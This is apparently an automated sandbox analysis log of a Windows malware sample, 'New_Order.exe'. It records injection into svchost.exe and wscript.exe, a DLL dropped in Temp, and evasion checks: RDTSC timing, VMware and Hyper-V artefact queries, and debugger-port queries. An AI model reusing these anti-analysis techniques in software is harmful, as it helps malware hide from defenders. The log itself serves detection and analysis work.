Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00414EC1 push es; retf 1_2_00414EC2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0397D0D1 push ecx; ret 1_2_0397D0E4
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_048BD0D1 push ecx; ret 7_2_048BD0E4
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_00620109 push eax; iretd 7_2_0062010B
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_0062A2F2 push es; ret 7_2_0062A337
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_00625BFC push ss; ret 7_2_00625BFD
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_0062B3B5 push eax; ret 7_2_0062B408
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_0062B46C push eax; ret 7_2_0062B472
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_0062B402 push eax; ret 7_2_0062B408
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_0062B40B push eax; ret 7_2_0062B472
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_006254D4 push ss; iretd 7_2_006254DC
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_00623E26 pushfd ; iretd 7_2_00623E27
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_00624EC1 push es; retf 7_2_00624EC2
Source: C:\Users\user\Desktop\New_Order.exe File created: C:\Users\user\AppData\Local\Temp\nshC36E.tmp\a9g5j8lkcs3.dll
Source: C:\Users\user\Desktop\New_Order.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements
Source: C:\Windows\SysWOW64\svchost.exe RDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\svchost.exe RDTSC instruction interceptor: First address: 000000000040897E second address: 0000000000408984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\wscript.exe RDTSC instruction interceptor: First address: 00000000006185E4 second address: 00000000006185EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\wscript.exe RDTSC instruction interceptor: First address: 000000000061897E second address: 0000000000618984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\New_Order.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_004088B0 rdtsc 1_2_004088B0
Source: C:\Windows\explorer.exe TID: 5048 Thread sleep time: -45000s >= -30000s
Source: C:\Windows\SysWOW64\wscript.exe TID: 6240 Thread sleep time: -44000s >= -30000s
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\wscript.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\New_Order.exe Code function: 0_2_0040646B FindFirstFileA,FindClose, 0_2_0040646B
Source: C:\Users\user\Desktop\New_Order.exe Code function: 0_2_004058BF GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose, 0_2_004058BF
Source: explorer.exe, 00000002.00000000.258112198.000000000891C000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00dRom0
Source: explorer.exe, 00000002.00000000.244873438.0000000003710000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000002.00000000.257813494.0000000008270000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000002.00000002.501665466.0000000003767000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000002.00000002.496335851.00000000011B3000.00000004.00000020.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
Source: explorer.exe, 00000002.00000000.258172711.00000000089B5000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
Source: explorer.exe, 00000002.00000000.257813494.0000000008270000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000002.00000002.507902104.00000000053C4000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
Source: explorer.exe, 00000002.00000000.257813494.0000000008270000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 00000002.00000000.258172711.00000000089B5000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
Source: explorer.exe, 00000002.00000000.257813494.0000000008270000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Windows\SysWOW64\svchost.exe Process information queried: ProcessInformation
Source: C:\Windows\SysWOW64\svchost.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\wscript.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00409B20 LdrLoadDll, 1_2_00409B20
Source: C:\Users\user\Desktop\New_Order.exe Code function: 0_2_10001000 mov eax, dword ptr fs:[00000030h] 0_2_10001000
Source: C:\Users\user\Desktop\New_Order.exe Code function: 0_2_024D1790 mov eax, dword ptr fs:[00000030h] 0_2_024D1790
Source: C:\Users\user\Desktop\New_Order.exe Code function: 0_2_024D19A8 mov eax, dword ptr fs:[00000030h] 0_2_024D19A8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03952397 mov eax, dword ptr fs:[00000030h] 1_2_03952397
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0395B390 mov eax, dword ptr fs:[00000030h] 1_2_0395B390
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039E138A mov eax, dword ptr fs:[00000030h] 1_2_039E138A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03931B8F mov eax, dword ptr fs:[00000030h] 1_2_03931B8F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039DD380 mov ecx, dword ptr fs:[00000030h] 1_2_039DD380
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03954BAD mov eax, dword ptr fs:[00000030h] 1_2_03954BAD
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039F5BA5 mov eax, dword ptr fs:[00000030h] 1_2_039F5BA5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039A53CA mov eax, dword ptr fs:[00000030h] 1_2_039A53CA
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039503E2 mov eax, dword ptr fs:[00000030h] 1_2_039503E2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0394DBE9 mov eax, dword ptr fs:[00000030h] 1_2_0394DBE9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039E131B mov eax, dword ptr fs:[00000030h] 1_2_039E131B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039F8B58 mov eax, dword ptr fs:[00000030h] 1_2_039F8B58
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0392F358 mov eax, dword ptr fs:[00000030h] 1_2_0392F358
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0392DB40 mov eax, dword ptr fs:[00000030h] 1_2_0392DB40
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03953B7A mov eax, dword ptr fs:[00000030h] 1_2_03953B7A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0392DB60 mov ecx, dword ptr fs:[00000030h] 1_2_0392DB60
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0395D294 mov eax, dword ptr fs:[00000030h] 1_2_0395D294
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0393AAB0 mov eax, dword ptr fs:[00000030h] 1_2_0393AAB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0395FAB0 mov eax, dword ptr fs:[00000030h] 1_2_0395FAB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039252A5 mov eax, dword ptr fs:[00000030h] 1_2_039252A5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03952ACB mov eax, dword ptr fs:[00000030h] 1_2_03952ACB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03952AE4 mov eax, dword ptr fs:[00000030h] 1_2_03952AE4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03925210 mov eax, dword ptr fs:[00000030h] 1_2_03925210
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03925210 mov ecx, dword ptr fs:[00000030h] 1_2_03925210
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0392AA16 mov eax, dword ptr fs:[00000030h] 1_2_0392AA16
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03943A1C mov eax, dword ptr fs:[00000030h] 1_2_03943A1C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039EAA16 mov eax, dword ptr fs:[00000030h] 1_2_039EAA16
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03938A0A mov eax, dword ptr fs:[00000030h] 1_2_03938A0A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03964A2C mov eax, dword ptr fs:[00000030h] 1_2_03964A2C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0394A229 mov eax, dword ptr fs:[00000030h] 1_2_0394A229
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039EEA55 mov eax, dword ptr fs:[00000030h] 1_2_039EEA55
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039B4257 mov eax, dword ptr fs:[00000030h] 1_2_039B4257
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03929240 mov eax, dword ptr fs:[00000030h] 1_2_03929240
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0396927A mov eax, dword ptr fs:[00000030h] 1_2_0396927A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039DB260 mov eax, dword ptr fs:[00000030h] 1_2_039DB260
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039F8A62 mov eax, dword ptr fs:[00000030h] 1_2_039F8A62
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03952990 mov eax, dword ptr fs:[00000030h] 1_2_03952990
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0395A185 mov eax, dword ptr fs:[00000030h] 1_2_0395A185
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0394C182 mov eax, dword ptr fs:[00000030h] 1_2_0394C182
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039A51BE mov eax, dword ptr fs:[00000030h] 1_2_039A51BE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039561A0 mov eax, dword ptr fs:[00000030h] 1_2_039561A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039E49A4 mov eax, dword ptr fs:[00000030h] 1_2_039E49A4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039A69A6 mov eax, dword ptr fs:[00000030h] 1_2_039A69A6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0392B1E1 mov eax, dword ptr fs:[00000030h] 1_2_0392B1E1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039B41E8 mov eax, dword ptr fs:[00000030h] 1_2_039B41E8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03929100 mov eax, dword ptr fs:[00000030h] 1_2_03929100
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0395513A mov eax, dword ptr fs:[00000030h] 1_2_0395513A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03944120 mov eax, dword ptr fs:[00000030h] 1_2_03944120
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03944120 mov ecx, dword ptr fs:[00000030h] 1_2_03944120
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0394B944 mov eax, dword ptr fs:[00000030h] 1_2_0394B944
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0392B171 mov eax, dword ptr fs:[00000030h] 1_2_0392B171
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0392C962 mov eax, dword ptr fs:[00000030h] 1_2_0392C962
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03929080 mov eax, dword ptr fs:[00000030h] 1_2_03929080
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039A3884 mov eax, dword ptr fs:[00000030h] 1_2_039A3884
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0395F0BF mov ecx, dword ptr fs:[00000030h] 1_2_0395F0BF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0395F0BF mov eax, dword ptr fs:[00000030h] 1_2_0395F0BF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039520A0 mov eax, dword ptr fs:[00000030h] 1_2_039520A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039690AF mov eax, dword ptr fs:[00000030h] 1_2_039690AF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039BB8D0 mov eax, dword ptr fs:[00000030h] 1_2_039BB8D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039BB8D0 mov ecx, dword ptr fs:[00000030h] 1_2_039BB8D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039240E1 mov eax, dword ptr fs:[00000030h] 1_2_039240E1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039258EC mov eax, dword ptr fs:[00000030h] 1_2_039258EC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039F4015 mov eax, dword ptr fs:[00000030h] 1_2_039F4015
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039A7016 mov eax, dword ptr fs:[00000030h] 1_2_039A7016
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0395002D mov eax, dword ptr fs:[00000030h] 1_2_0395002D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0393B02A mov eax, dword ptr fs:[00000030h] 1_2_0393B02A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03940050 mov eax, dword ptr fs:[00000030h] 1_2_03940050
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039F1074 mov eax, dword ptr fs:[00000030h] 1_2_039F1074
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039E2073 mov eax, dword ptr fs:[00000030h] 1_2_039E2073
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03938794 mov eax, dword ptr fs:[00000030h] 1_2_03938794
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039A7794 mov eax, dword ptr fs:[00000030h] 1_2_039A7794
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039637F5 mov eax, dword ptr fs:[00000030h] 1_2_039637F5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0394F716 mov eax, dword ptr fs:[00000030h] 1_2_0394F716
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039BFF10 mov eax, dword ptr fs:[00000030h] 1_2_039BFF10
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039F070D mov eax, dword ptr fs:[00000030h] 1_2_039F070D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0395A70E mov eax, dword ptr fs:[00000030h] 1_2_0395A70E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0395E730 mov eax, dword ptr fs:[00000030h] 1_2_0395E730
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03924F2E mov eax, dword ptr fs:[00000030h] 1_2_03924F2E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0393EF40 mov eax, dword ptr fs:[00000030h] 1_2_0393EF40
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0393FF60 mov eax, dword ptr fs:[00000030h] 1_2_0393FF60
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039F8F6A mov eax, dword ptr fs:[00000030h] 1_2_039F8F6A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039BFE87 mov eax, dword ptr fs:[00000030h] 1_2_039BFE87
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039F0EA5 mov eax, dword ptr fs:[00000030h] 1_2_039F0EA5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039A46A7 mov eax, dword ptr fs:[00000030h] 1_2_039A46A7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039F8ED6 mov eax, dword ptr fs:[00000030h] 1_2_039F8ED6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03968EC7 mov eax, dword ptr fs:[00000030h] 1_2_03968EC7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039536CC mov eax, dword ptr fs:[00000030h] 1_2_039536CC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039DFEC0 mov eax, dword ptr fs:[00000030h] 1_2_039DFEC0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039376E2 mov eax, dword ptr fs:[00000030h] 1_2_039376E2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039516E0 mov ecx, dword ptr fs:[00000030h] 1_2_039516E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0395A61C mov eax, dword ptr fs:[00000030h] 1_2_0395A61C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0392C600 mov eax, dword ptr fs:[00000030h] 1_2_0392C600
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03958E00 mov eax, dword ptr fs:[00000030h] 1_2_03958E00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039E1608 mov eax, dword ptr fs:[00000030h] 1_2_039E1608
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039DFE3F mov eax, dword ptr fs:[00000030h] 1_2_039DFE3F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0392E620 mov eax, dword ptr fs:[00000030h] 1_2_0392E620
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03937E41 mov eax, dword ptr fs:[00000030h] 1_2_03937E41
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039EAE44 mov eax, dword ptr fs:[00000030h] 1_2_039EAE44
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0394AE73 mov eax, dword ptr fs:[00000030h] 1_2_0394AE73
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394AE73 mov eax, dword ptr fs:[00000030h]1_2_0394AE73
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394AE73 mov eax, dword ptr fs:[00000030h]1_2_0394AE73
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394AE73 mov eax, dword ptr fs:[00000030h]1_2_0394AE73
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393766D mov eax, dword ptr fs:[00000030h]1_2_0393766D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395FD9B mov eax, dword ptr fs:[00000030h]1_2_0395FD9B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395FD9B mov eax, dword ptr fs:[00000030h]1_2_0395FD9B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03952581 mov eax, dword ptr fs:[00000030h]1_2_03952581
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03952581 mov eax, dword ptr fs:[00000030h]1_2_03952581
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03952581 mov eax, dword ptr fs:[00000030h]1_2_03952581
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03952581 mov eax, dword ptr fs:[00000030h]1_2_03952581
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03922D8A mov eax, dword ptr fs:[00000030h]1_2_03922D8A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03922D8A mov eax, dword ptr fs:[00000030h]1_2_03922D8A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03922D8A mov eax, dword ptr fs:[00000030h]1_2_03922D8A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03922D8A mov eax, dword ptr fs:[00000030h]1_2_03922D8A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03922D8A mov eax, dword ptr fs:[00000030h]1_2_03922D8A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03951DB5 mov eax, dword ptr fs:[00000030h]1_2_03951DB5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03951DB5 mov eax, dword ptr fs:[00000030h]1_2_03951DB5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03951DB5 mov eax, dword ptr fs:[00000030h]1_2_03951DB5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F05AC mov eax, dword ptr fs:[00000030h]1_2_039F05AC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F05AC mov eax, dword ptr fs:[00000030h]1_2_039F05AC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039535A1 mov eax, dword ptr fs:[00000030h]1_2_039535A1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039A6DC9 mov eax, dword ptr fs:[00000030h]1_2_039A6DC9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039A6DC9 mov eax, dword ptr fs:[00000030h]1_2_039A6DC9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039A6DC9 mov eax, dword ptr fs:[00000030h]1_2_039A6DC9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039A6DC9 mov ecx, dword ptr fs:[00000030h]1_2_039A6DC9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039A6DC9 mov eax, dword ptr fs:[00000030h]1_2_039A6DC9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039A6DC9 mov eax, dword ptr fs:[00000030h]1_2_039A6DC9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D8DF1 mov eax, dword ptr fs:[00000030h]1_2_039D8DF1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393D5E0 mov eax, dword ptr fs:[00000030h]1_2_0393D5E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393D5E0 mov eax, dword ptr fs:[00000030h]1_2_0393D5E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039EFDE2 mov eax, dword ptr fs:[00000030h]1_2_039EFDE2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039EFDE2 mov eax, dword ptr fs:[00000030h]1_2_039EFDE2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039EFDE2 mov eax, dword ptr fs:[00000030h]1_2_039EFDE2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039EFDE2 mov eax, dword ptr fs:[00000030h]1_2_039EFDE2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392AD30 mov eax, dword ptr fs:[00000030h]1_2_0392AD30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03933D34 mov eax, dword ptr fs:[00000030h]1_2_03933D34
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03933D34 mov eax, dword ptr fs:[00000030h]1_2_03933D34
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03933D34 mov eax, dword ptr fs:[00000030h]1_2_03933D34
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03933D34 mov eax, dword ptr fs:[00000030h]1_2_03933D34
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03933D34 mov eax, dword ptr fs:[00000030h]1_2_03933D34
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03933D34 mov eax, dword ptr fs:[00000030h]1_2_03933D34
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03933D34 mov eax, dword ptr fs:[00000030h]1_2_03933D34
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03933D34 mov eax, dword ptr fs:[00000030h]1_2_03933D34
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03933D34 mov eax, dword ptr fs:[00000030h]1_2_03933D34
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03933D34 mov eax, dword ptr fs:[00000030h]1_2_03933D34
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03933D34 mov eax, dword ptr fs:[00000030h]1_2_03933D34
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03933D34 mov eax, dword ptr fs:[00000030h]1_2_03933D34
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03933D34 mov eax, dword ptr fs:[00000030h]1_2_03933D34
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039EE539 mov eax, dword ptr fs:[00000030h]1_2_039EE539
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F8D34 mov eax, dword ptr fs:[00000030h]1_2_039F8D34
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AA537 mov eax, dword ptr fs:[00000030h]1_2_039AA537
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03954D3B mov eax, dword ptr fs:[00000030h]1_2_03954D3B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03954D3B mov eax, dword ptr fs:[00000030h]1_2_03954D3B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03954D3B mov eax, dword ptr fs:[00000030h]1_2_03954D3B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03947D50 mov eax, dword ptr fs:[00000030h]1_2_03947D50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03963D43 mov eax, dword ptr fs:[00000030h]1_2_03963D43
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039A3540 mov eax, dword ptr fs:[00000030h]1_2_039A3540
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D3D40 mov eax, dword ptr fs:[00000030h]1_2_039D3D40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394C577 mov eax, dword ptr fs:[00000030h]1_2_0394C577
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394C577 mov eax, dword ptr fs:[00000030h]1_2_0394C577
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393849B mov eax, dword ptr fs:[00000030h]1_2_0393849B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F8CD6 mov eax, dword ptr fs:[00000030h]1_2_039F8CD6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E14FB mov eax, dword ptr fs:[00000030h]1_2_039E14FB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039A6CF0 mov eax, dword ptr fs:[00000030h]1_2_039A6CF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039A6CF0 mov eax, dword ptr fs:[00000030h]1_2_039A6CF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039A6CF0 mov eax, dword ptr fs:[00000030h]1_2_039A6CF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039A6C0A mov eax, dword ptr fs:[00000030h]1_2_039A6C0A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039A6C0A mov eax, dword ptr fs:[00000030h]1_2_039A6C0A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039A6C0A mov eax, dword ptr fs:[00000030h]1_2_039A6C0A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039A6C0A mov eax, dword ptr fs:[00000030h]1_2_039A6C0A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F740D mov eax, dword ptr fs:[00000030h]1_2_039F740D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F740D mov eax, dword ptr fs:[00000030h]1_2_039F740D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F740D mov eax, dword ptr fs:[00000030h]1_2_039F740D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E1C06 mov eax, dword ptr fs:[00000030h]1_2_039E1C06
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E1C06 mov eax, dword ptr fs:[00000030h]1_2_039E1C06
